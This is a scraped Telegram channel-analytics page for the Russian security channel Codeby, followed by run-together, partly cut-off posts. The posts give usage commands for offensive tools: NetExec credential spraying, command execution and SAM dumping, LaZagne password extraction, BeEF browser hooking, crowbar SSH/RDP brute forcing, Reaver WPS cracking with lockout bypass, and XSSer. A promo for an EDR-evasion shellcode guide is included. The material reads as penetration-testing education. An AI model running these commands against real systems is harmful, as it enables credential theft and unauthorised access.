Codeby
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina
Показати більше📈 Аналітичний огляд Telegram-каналу Codeby
Канал Codeby (@codeby_sec) у мовному сегменті Російська є активним учасником. На даний момент спільнота об'єднує 36 830 підписників, посідаючи 3 509 місце в категорії Технології та додатки та 17 214 місце у регіоні Росія.
📊 Показники аудиторії та динаміка
З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 36 830 підписників.
За останніми даними від 31 серпня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 27, а за останні 24 години на -9, загальне охоплення залишається високим.
- Статус верифікації: Не верифікований
- Рівень залученості (ER): Середній показник залученості аудиторії становить 6.65%. Протягом перших 24 годин після публікації контент зазвичай збирає 4.11% реакцій від загальної кількості підписників.
- Охоплення публікацій: В середньому кожен допис отримує 2 449 переглядів. Протягом першої доби публікація в середньому набирає 1 515 переглядів.
- Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 14.
- Тематичні інтереси: Контент зосереджений навколо ключових тем, таких як edr, api, вектор, mitre, att&ck.
📝 Опис та контентна політика
Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
“Блог сообщества Кодебай
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Реклама: @Savchenkova_Valentina”
Завдяки високій частоті оновлень (останні дані отримано 01 вересня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
🖥Запуск:
⏺️Для проверки активных хостов и открытых портов, пишем команду:
netexec smb 127.0.0.1
⏺️Чтобы посмотреть активные сеансы:
netexec smb 127.0.0.1 -u {USERNAME} -p {PASSWORD} --sessions
⏺️NetExec также способен выполнять атаки по сбору паролей и учетных данных:
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST}
⏺️С помощью ключа -x мы можем выполнять команды:
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST} -x 'net localgroup administrators'
⏺️Создание дампа базы данных SAM
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST} --samlaZagne.exe all -oNЗапуск только определенного скрипта для браузера c целью извлечения паролей из firefox:
laZagne.exe browsers -firefox
Для расшифровки учетных данных домена можно указать пароль пользователя Windows, иначе будут перебраны уже найденные пароли Windows:
laZagne.exe all -password pass-v - увеличить уровень детализации -quiet - тихий режим без вывода информации на экран Для извлечения Wi-Fi паролей\секретов Windows необходимо запускать программу с правами администратора. В случае запуска с административными привилегиями LaZagne удаётся получить пароли для других пользователей. В Mac OS без пароля пользователя сложно восстановить пароли, хранящиеся на компьютере, поэтому рекомендуется запускать утилиту передавая её учетные данные пользователя. 💻Установить исполняемый файл можно здесь
Присоединяйтесь к Академии Кодебай – защищайте мир от угроз, находя уязвимости и предотвращая кибератаки!🚀 По всем вопросам пишите @Codeby_Academy
sudo apt install -y beef-xss
📌Запуск:
sudo beef-xss
Устанавилваем пароль для нового пользователя beef
Далее запускается демон beef и ссылка на порт на котором он запущен с web UI.
Для того чтобы "поймать браузер", используем демо страницу:
http://localhost:3000/demos/butcher/index.htmlДалее вы увидите браузер в директории "Online Browsers" в левом углу программы. Новая вкладка представляет подробности по браузеру, подцепленную страницу и подцепленный хост, а также обеспечивает новое меню из вкладок по выбранному браузеру. 📎Модули имеют 3 цвета: Зелёный - Он работает на выбраном браузере, работаем! Ораньжевый - Он будет работать, но пользователь может это выявить. Красный - На этом браузере модуль не сработает! 💡С помощью этого иструмента вы сможете: 1️⃣Осуществить сбор информации - Отпечатки браузеров, Информация, которую BeEF собирает по умолчанию с подцепленного браузера, Сбор информации о системе, Результат модуля Get System, Отпечатки пользовательского поведения 2️⃣Осуществить атаку методом социальной инженерии - Запрос учётных записей, Перенаправление на другую страницу.
sudo apt install -y feroxbuster
2️⃣
git clone https://github.com/epi052/feroxbuster
📌Запуск:
feroxbuster💡Для перебора директорий и файлов, используем такую команду:
feroxbuster --url http://localhost:80/
💡Для перебора файлов с расширениями, используем команду с таким ключём:
feroxbuster --url http://localhost:80/ -x php
💡Для фильтрации кода ответа сервера, используйте команду с таким ключём:
feroxbuster --url http://localhost:80/ --filter-status 200
💡Для очень детального анализа, используйте такой ключ:
feroxbuster --url http://localhost:80/ --extract-links
💡Чтобы отфильтровать вывод по словам, используйте такую команду:
feroxbuster --url http://localhost:80/ -W 5
Это не весь функционал этой утилиты, он намного обширнее!
https.get и https.request, для кражи данных или удалённого управления.
6️⃣ 537 пакетов с пустыми описаниями, что ещё больше скрывает их истинные намерения и повышает риск незамеченной вредоносной активности.
7️⃣ 164 пакета с необычно высокими номерами версий, которые вводят пользователей в заблуждение, заставляя их доверять устаревшему или потенциально опасному программному обеспечению.sudo apt install -y crowbar
2️⃣
git clone https://github.com/galkan/crowbar
pip3 install -r requirements.txt
➡️Запуск:
crowbar --help
🖥Для подбора пароля для SSH используем такую команду:
crowbar -b sshkey -k ~/.ssh/id_rsa -u kali -s 127.0.0.1/32
Где, -b - это то, что мы будем брутить -k - конфигурационный файл (в нашем случае id_rsa) -u - имя пользователя -s - сервер куда мы подключаемся🖥Для подбра пароля для RDP используем такую команду:
crowbar -b rdp -s 127.0.0.1/32 -u Windowz -c 12345six
Где, -c - это пароль💡Для указания файла нужно использовать заглавные буквы в ключах (-C /path/to/wordlist)
Reaver WPS Fork t6x — это инструмент для проведения атак на WPS (Wi-Fi Protected Setup), который помогает находить слабости в Wi-Fi сетях с включённой функцией WPS. Этот форк улучшает оригинальную утилиту Reaver, добавляя стабильность, производительность и новые функции.➡️ Как работает Reaver? Основной принцип работы Reaver заключается в переборе PIN-кодов WPS до нахождения правильного, что позволяет получить доступ к настройкам маршрутизатора и извлечь WPA/WPA2 пароль. 1️⃣ Идентификация цели Перед началом атаки Reaver использует утилиту wash для поиска Wi-Fi сетей с включённой функцией WPS. Вы можете получить список доступных сетей, чтобы выбрать цель для тестирования. 2️⃣ Перебор PIN-кодов Reaver последовательно отправляет PIN-коды к маршрутизатору, используя механизмы WPS. Атака разделяется на две части: • Перебор первых 4 цифр PIN-кода. • Перебор последних 3 цифр. Такой подход значительно сокращает общее количество комбинаций. 3️⃣ Обход защит Некоторые маршрутизаторы применяют защиту, блокируя WPS после нескольких попыток. Форк t6x добавляет функции, которые позволяют обходить эти механизмы: • Задержки между попытками. • Использование фальшивых MAC-адресов. • Автоматическое возобновление атаки после блокировки. 4️⃣ Извлечение WPA/WPA2 пароля После успешного подбора PIN, Reaver извлекает пароль сети, что позволяет подключиться к Wi-Fi. ➡️ Установка и настройка Reaver Утилита устанавливается из исходного кода с GitHub
sudo apt install build-essential libpcap-dev aircrack-ng git
git clone https://github.com/t6x/reaver-wps-fork-t6x
cd reaver-wps-fork-t6x/src
./configure
make
sudo make install
➡️ Пример использования wash и reaver
🔍 Сканирование сетей с помощью wash
root@kali:~# wash -i wlan0mon -c 6 -C BSSID Ch dBm WPS Lck Vendor ESSID ------------------------------------------------------ E0:3F:49:6A:57:78 6 -73 1.0 No Unknown ASUS-i - выбор интерфейса для сканирования -с - выбор канала -С - игнорирование ошибок контрольной суммы кадров 🦴 Пример использования reaver
root@kali:~# reaver -i wlan0mon -b E0:3F:49:6A:57:78 -v Reaver v1.6.5 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Waiting for beacon from E0:3F:49:6A:57:78 [+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS) [+] Trying pin 12345670-i - выбор интерфейса -b - MAC адрес цели -v - более подробный вывод процесса работы
git clone https://github.com/epsylon/xsser
pip3 install cairocffi
pip3 install pygeoip
./xsser -h
💡Если при установке у вас выскакивает ошибка "error: externally-managed-environment", не забывайте указывать ключ —break-system-packages
📎Примеры:
Ключём -u мы задаём цель, а ключ -g происходит от слова GET, так что это то, что будет в GET.
Здесь аналогично с утилитой FUFF, нужно подставить ключевое слово туда, где будет осуществляться перебор.
./xsser -u 'http://localhost/' -g '?{PARAM}=XSS'
У утилиты также имеется gui интерфейс, вызвать его можно этой командой:
./xsser --gtkuser-mode->kernel-mode транзита.
Но можно ли скрыть подозрительные вызовы в стеке? Да! Один из мощных способов — асинхронное выполнение кода через системные механизмы:
🔸 Использование ThreadPool (TpAllocWork, TpPostWork, CreateThreadpoolWork) — переносит выполнение кода в системные потоки.
🔸 Обратные вызовы (Callback) и APC (Asynchronous Procedure Calls) — выполняют код не напрямую, а в контексте другого потока.
🔸 Использование NtContinue и ROP для перезапуска стека без явного API-вызова.
Содержание статьи:
🔸 Разбор стековой телеметрии EDR на Windows.
🔸 Как Callback & ThreadPool обходят мониторинг стека?
🔸 Практический пример загрузки шеллкода без следов в ETW.
Полный гайд по обходу современных EDR — читайте в статье!ublock - https://addons.mozilla.org/ru/firefox/addon/ublock-origin/?utm_source=addons.mozilla.org&utm_medium=referral&utm_content=search User-agent Switcher - https://addons.mozilla.org/ru/firefox/addon/user-agent-switcher-revived/ NoScript - https://addons.mozilla.org/ru/firefox/addon/noscript/ PrivacyBadger - https://addons.mozilla.org/ru/firefox/addon/privacy-badger17/?utm_source=addons.mozilla.org&utm_medium=referral&utm_content=search Canvas Defender - https://addons.mozilla.org/de/firefox/addon/no-canvas-fingerprinting/ FoxyProxy - https://addons.mozilla.org/ru/firefox/addon/foxyproxy-standard/ Cookie-Editor - https://addons.mozilla.org/ru/firefox/addon/cookie-editor/
